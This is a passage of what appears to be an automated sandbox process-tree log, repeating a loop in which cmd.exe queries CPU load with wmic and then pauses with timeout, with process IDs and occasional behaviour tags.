  PID:4504
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3660
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2716
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1932
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5008
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:64
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4668
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2132
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3708
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:392
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1036
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2860
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2856
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2800
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2764
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1216
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1540
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3084
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3568
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3536
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4732
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4488
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4072
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4536
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4940
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2216
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1888
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4448
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:700
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:60
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4524
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4980
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:976
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:196
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:316
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3412
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3188
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1872
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1720
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4856
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4704
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3920
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:864
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3416
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1884
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:780
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2668
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1260
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3380
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3832
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4828
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:64
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2788
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2132
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:680
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:360
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1304
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2860
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1280
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2800
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2876
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4392
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4552
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2228
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4084
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2472
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5040
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4496
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:304
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2640
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3840
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4940
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1888
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4024
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4524
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2888
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3376
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2564
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2148
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4156
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3412
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4564
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4972
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:424
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4212
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2540
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:8
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1672
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:408
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2972
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4348
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3104
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4016
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1104
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3832
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2788
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3708
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:680
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2240
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1304
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4628
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1280
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2764
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2876
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4788
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4260
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2692
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3616
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3884
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4832
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2228
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2472
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5040
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3120
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4804
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2216
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4664
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3680
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3204
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4024
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:520
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4548
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:976
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:748
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:656
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3412
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:648
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1872
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4164
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5020
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3400
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4060
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4284
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4172
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2056
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:820
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1936
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3192
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1256
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2804
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2788
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:680
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:960
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1860
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1548
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4592
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3336
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4292
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5108
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4268
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4356
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4776
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4184
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3932
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4480
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5040
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1492
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4804
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2780
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4664
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3804
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4124
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1448
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4716
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4236
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3280
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4600
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2476
- - C:\Windows\System32\Wbem\WMIC.exe
